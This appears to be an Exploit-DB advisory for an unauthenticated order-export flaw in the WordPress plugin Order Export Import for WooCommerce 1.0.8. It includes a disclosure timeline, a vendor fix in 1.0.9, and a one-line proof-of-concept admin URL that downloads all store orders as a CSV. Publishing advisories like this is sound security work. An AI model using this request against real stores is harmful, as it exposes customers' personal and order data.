WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure

Author: david-peltier
type: webapps
platform: php
port: 80.0
date_added: 2016-09-19 
date_updated: 2016-09-19 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comorder-import-export-for-woocommerce.1.0.8.zip

# Exploit Title: WordPress Plugin Order Export Import for WooCommerce
# Link: https://wordpress.org/plugins/order-import-export-for-woocommerce/
# Version: 1.0.8
# Date: 19th 2016
# Exploit Author: contact ([a]) david-peltier ([d]) fr
# Vendor Homepage: xadapter.com
# Version: 1.0.8
# Timeline: Vuln found: 17-09-2016, reported to vendor: 18-09-2016, fix: 19-09-2016


### SUMMARY

WooCommerce Order Export Import Plugin helps you to easily export and import orders in your store.
This attacks allows an attacker to export all order without being authenticated

### POC

http://server/wp-admin/admin.php?page=wf_woocommerce_order_im_ex&action=export
A .CSV with all orders will be downloaded

### FIX

The vendor fix this issue in 1.0.9